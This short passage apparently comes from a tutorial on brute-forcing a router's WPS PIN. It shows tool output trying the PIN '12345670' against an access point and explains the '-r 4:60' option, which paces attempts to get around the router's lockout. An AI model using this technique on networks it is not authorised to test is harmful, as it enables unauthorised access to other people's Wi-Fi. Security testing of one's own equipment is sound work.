[+] Associated with D0:57:94:B8:AC:F6 (ESSID: REMOVED)
[+] Trying pin "12345670"Just so you are aware decent routers with WPS turned on will try and prevent these attacks. If you have a certain number of failed attempts within a time period it will be rate limited and blocked for some time. The way this is handled is providing “-r 4:60” which means try 4 attempts every 60 seconds.